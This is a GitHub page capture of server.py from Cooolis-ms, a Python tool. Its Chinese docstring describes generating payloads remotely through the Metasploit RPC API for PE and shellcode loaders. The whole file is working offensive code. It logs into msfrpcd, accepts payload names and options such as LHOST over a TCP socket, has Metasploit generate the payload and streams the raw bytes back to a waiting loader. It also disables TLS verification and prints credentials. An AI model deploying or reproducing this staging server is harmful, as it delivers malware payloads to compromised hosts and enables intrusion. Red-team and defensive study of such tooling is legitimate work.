-
Notifications
You must be signed in to change notification settings - Fork 137
/
Copy pathserver.py
138 lines (119 loc) · 5.78 KB
/
server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
"""
Cooolis-ms
------------
Author:[email protected]
根据Metasploit Framework RPC 实现远程生成PAYLOAD,主要用于给灵活的PE加载器、Shellcode工作
Github:https://github.com/Rvn0xsy/Cooolis-ms/
"""
import requests
from argparse import ArgumentParser
import msgpack
import ssl
import sys
import json
import struct
from socketserver import BaseRequestHandler,ThreadingTCPServer
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
ssl._create_default_https_context = ssl._create_unverified_context
class Metasploit_RPC(BaseRequestHandler):
def __init__(self, request, client_address, server, args):
self.type = args.type
self.username = args.username
self.password = args.password
self.listen = args.listen
self.host = args.host
self.port = args.port
self.server = args.server
self.uri = args.uri
self.debug = args.versobe
self.token = ''
self.url = ''
self.headers = {"Content-type" : "binary/message-pack"}
if args.ssl:
prefix = 'https://'
else:
prefix = 'http://'
self.url = "{prefix}{host}:{port}{uri}".format(prefix=prefix,host=self.host,port=self.port,uri=self.uri)
super().__init__(request, client_address, server)
@classmethod
def Creator(cls, *args, **kwargs):
def _HandlerCreator(request, client_address, server):
cls(request, client_address, server, *args, **kwargs)
return _HandlerCreator
def _request(self,options):
try:
print("[*]API URL : {url} , Method : {method}".format(url=self.url,method=options[0]))
options = self.__pack(options)
req = requests.post(self.url,verify=False,headers=self.headers,data=options)
result = self.__unpack(req.content)
if b'error' in result:
print("Error : %s" % str(result[b'error_message']),encoding = "utf8")
else:
return result
except Exception as e:
sys.stderr.write(str(e)+"\nRef:https://metasploit.help.rapid7.com/docs/standard-api-methods-referenc\n")
def _get_token(self):
options = ["auth.login",self.username,self.password]
result = self._request(options)
self.token = str(result[b'token'],encoding = "utf8")
print("[*]Token: {token} Username : {username} Password : {password}".format(token=self.token,username=self.username,password=self.password))
# 打包数据
def __pack(self,pack_str):
return msgpack.packb(pack_str)
# 解包数据
def __unpack(self,pack_str):
return msgpack.unpackb(pack_str)
def __send_payload(self,payload,options):
print("[*]PAYLOAD: {payload}, OPTIONS: {options}".format(payload=payload,options=options))
pack_data = ["module.execute",self.token,"payload",payload,options]
return self._request(pack_data)
def handle(self):
print("[*]New connection: {client}".format(client=self.client_address))
self._get_token()
while True:
data = self.request.recv(1024)
if not data:break
try:
data = struct.unpack(">200s200s",data)
options = {}
str_json = data[1].decode('UTF-8')
str_json = str_json.strip('\x00')
# print("Options : %s size : %d",str_json,len(str_json))
for x in str_json.split(','):
k,v = x.split('=',2)
# print(k,":",v)
options.update({k.strip():v.strip()})
payload = data[0].decode('UTF-8')
payload = payload.strip('\x00')
# print("Payload : %s Options : %s " % (payload,options['LHOST']))
recv_payload = self.__send_payload(payload,options)
# print("Send .. %s ",recv_payload)
payload_size = len(recv_payload[b'payload'])
self.request.send(payload_size.to_bytes(4,byteorder='little',signed=False))
self.request.send(recv_payload[b'payload'])
self.request.close()
except Exception as e:
print("[!]{error}".format(error=str(e)))
pass
finally:
break
def main():
example = 'Example:\n\n$ python3 server.py -U msf -P msf -v -s -l 4444'
args = ArgumentParser(prog='Cooolis-ms',epilog=example)
args.add_argument('-U','--username',help='Metasploit web service username',required=True)
args.add_argument('-P','--password',help='Metasploit web service password',required=True)
args.add_argument('-H','--host',help='Metasploit web service host, Default: localhost',default='localhost')
args.add_argument('-p','--port',help='Metasploit RPC service port, Default: 55553',default=55553,type=int)
args.add_argument('-S','--server',help='Payload sender listen host, Default: localhost',default='localhost')
args.add_argument('-l','--listen',help='Payload listen port, Default: 1111',default=1111,type=int)
args.add_argument('-u','--uri',help='Metasploit RPC service uri, Default: /api/1.0/',default='/api/1.0/')
args.add_argument('-t','--type',help='Payload Type',choices=('exe','ruby','c','dll','vbs','powershell'))
args.add_argument('-s','--ssl',help='Enable ssl, Default: True',action="store_true",default=True)
args.add_argument('-v','--versobe',help='Enable debug',action="store_true")
parser = args.parse_args()
print("[*]Server Host : {host} , Server Port : {port}".format(host=parser.server,port=parser.listen))
server = ThreadingTCPServer((parser.server,parser.listen),Metasploit_RPC.Creator(parser))
server.serve_forever()
if __name__ == "__main__":
main()